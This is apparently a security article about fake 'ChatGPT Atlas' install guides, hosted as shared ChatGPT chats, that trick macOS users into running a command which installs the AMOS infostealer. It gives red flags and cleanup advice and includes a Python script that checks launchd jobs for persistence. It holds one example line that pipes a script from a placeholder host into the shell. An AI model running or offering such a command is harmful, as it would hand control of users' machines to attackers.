"Cybercriminals are abusing ChatGPT’s chat-sharing feature to distribute fake “ChatGPT Atlas” install guides that deliver the deadly AMOS macOS infostealer through social engineering."
How Are Fake ChatGPT Atlas Guides Being Used for Attacks?
Security researchers have uncovered a clever new malware campaign targeting macOS users by abusing ChatGPT’s built-in chat-sharing feature. Attackers create highly polished conversations using ChatGPT that claim to be official step-by-step installation guides for a fake browser called ChatGPT Atlas. These shared chats are published on the trusted chatgpt.com/share domain, making them look completely legitimate at first glance.
The attackers then buy Google Ads for search terms such as “chatgpt atlas” or “atlas browser mac”. When users click the ads, they land directly on those shared ChatGPT pages. Because the URL belongs to OpenAI’s domain and the content reads professionally, victims often assume the guide is safe and official.
What Is the ClickFix Technique?
The attack uses a growing social-engineering method called ClickFix. Instead of exploiting security vulnerabilities, scammers simply convince users to run malicious commands themselves.
On the fake guide page, users are instructed to copy and paste a one-line shell command into macOS Terminal to either “install Atlas” or “fix a browser issue.” The command quietly downloads and runs a script from a malicious domain such as atlas-extension[.]com, which immediately begins the infection process.
```sh
# Example of how these attacks convince users
curl -fsSL malicious-domain.example/install.sh | sh
```
Once the command is executed, the shell runs whatever script the attacker-controlled server returns, so the attacker decides what runs on the victim’s computer.
What Exactly Does AMOS Malware Do?
The downloaded malware is AMOS (Atomic macOS Stealer), a commercial-grade infostealer widely used by cybercriminals. After execution, the malware repeatedly asks users for their macOS administrator password using fake system prompts until it receives valid sudo credentials.
With elevated privileges, AMOS steals a wide range of sensitive data, including:
- Saved browser passwords, cookies, and autofill data from Chrome, Firefox, and Chromium-based browsers
- Cryptocurrency wallet data from apps like Electrum, Coinomi, and Exodus
- Wallet browser extensions
- Documents such as TXT, PDF, and DOCX files from Desktop, Documents, and Downloads folders
- Session data from Telegram Desktop and OpenVPN
Is There a Backdoor After the Theft?
Yes—and this is what makes the attack especially dangerous. Beyond stealing data once, the malware installs a persistent backdoor using macOS startup mechanisms like LaunchAgents or LaunchDaemons. This ensures the attacker regains access every time the computer boots.
Because the backdoor runs with the same privileges obtained through the stolen sudo password, attackers can:
- Steal more files at any time
- Deploy new malware payloads
- Use infected computers for further attacks
Security warning: Even if the original malware is removed, system access may remain compromised. Passwords, tokens, and keys should be considered exposed and rotated.
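A triage sketch for the persistence described above, added here as an example and not taken from the campaign analysis or any vendor tool: it parses launchd job files from the standard LaunchAgents/LaunchDaemons directories and lists those worth a manual look. The heuristics (interpreter launch, hidden or world-writable paths) and the sample jobs in `demo()` are assumptions constructed for illustration, not AMOS indicators.

```python
import plistlib
import tempfile
from pathlib import Path

# Standard launchd persistence directories on macOS
LAUNCH_DIRS = ["~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons"]
# Triage heuristics: assumptions of this example, not indicators from the article
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "curl"}
WRITABLE = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")

def is_hidden(arg):
    # True for an absolute or home-relative path with a dot-prefixed component
    parts = [p for p in arg.split("/") if p not in (".", "..")]
    return arg.startswith(("/", "~")) and any(p.startswith(".") for p in parts)

def review_job(path):
    """Return reasons why one launchd job deserves a manual look."""
    try:
        job = plistlib.loads(Path(path).read_bytes())  # XML or binary plist
    except Exception as exc:
        return [f"unparseable plist: {type(exc).__name__}"]
    if not isinstance(job, dict):
        return ["top-level object is not a dictionary"]
    argv = [str(job["Program"])] if job.get("Program") else []
    argv += [str(a) for a in job.get("ProgramArguments") or []]
    if not argv:
        return ["no Program or ProgramArguments"]
    reasons = [f"launches an interpreter: {argv[0]}"] if Path(argv[0]).name in INTERPRETERS else []
    reasons += [f"hidden path: {a}" for a in argv if is_hidden(a)]
    reasons += [f"world-writable location: {a}" for a in argv if a.startswith(WRITABLE)]
    if reasons and (job.get("RunAtLoad") or job.get("KeepAlive")):
        reasons.append("starts or restarts automatically (RunAtLoad/KeepAlive)")
    return reasons

def audit(dirs=LAUNCH_DIRS):
    """Map each flagged plist path to its list of reasons."""
    files = [p for d in dirs for p in sorted(Path(d).expanduser().glob("*.plist"))]
    return {str(p): r for p in files if (r := review_job(p))}

def demo():
    # Constructed sample jobs; labels and paths are made up for this example
    jobs = {"com.example.updater": ["/Applications/Example.app/Contents/MacOS/updater"],
            "com.example.helper": ["/bin/bash", "/Users/test/.helper/agent.sh"]}
    with tempfile.TemporaryDirectory() as tmp:
        for label, argv in jobs.items():
            job = {"Label": label, "ProgramArguments": argv, "RunAtLoad": True}
            Path(tmp, label + ".plist").write_bytes(plistlib.dumps(job))
        return {Path(p).name: r for p, r in audit([tmp]).items()}

if __name__ == "__main__":
    print(demo())
```

On a Mac, calling `audit()` with no arguments scans the real directories; a hit is a prompt for manual review, since legitimate software also ships shell-launched jobs.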
Why the “ChatGPT Atlas” Name Works So Well
The campaign succeeds because ChatGPT Atlas is the name of a real AI browser launched by OpenAI in October 2025. Victims searching for more information about it naturally trust results tied to ChatGPT branding.
However, there is no legitimate standalone installer distributed through third-party sites. Any ad or shared guide pointing to random download sources is almost certainly malicious.
| Legitimate Behavior | Malicious Red Flags |
|---|---|
| Official links from OpenAI websites or apps | Ads leading to chatgpt.com/share pages |
| No password needed for browser installs | Requests for sudo password |
| No Terminal commands required | One-line Terminal copy/paste commands |
How Can macOS Users Stay Safe?
Basic cyber hygiene goes a long way in preventing these types of attacks:
- Never run Terminal commands copied from ads, social posts, or shared chats.
- Verify domains carefully. OpenAI does not distribute software from unknown third-party websites.
- Be suspicious of any installer asking for your macOS administrator password.
- Use reputable security software and keep macOS fully updated.
- If unsure about a command, ask an expert or paste it into an analysis tool before running it.
FAQs
Is ChatGPT Atlas itself malware?
No. ChatGPT Atlas is a legitimate product, but criminals are abusing its name to trick users into running fake installers.
Are shared ChatGPT links unsafe by default?
Not usually, but attackers can host harmful instructions inside legitimate shared chats. Always treat technical instructions from unknown sources with caution.
What should I do if I already ran one of these commands?
Disconnect from the internet, run professional malware scans, change all passwords, revoke active sessions, and consider reinstalling macOS to ensure complete cleanup.
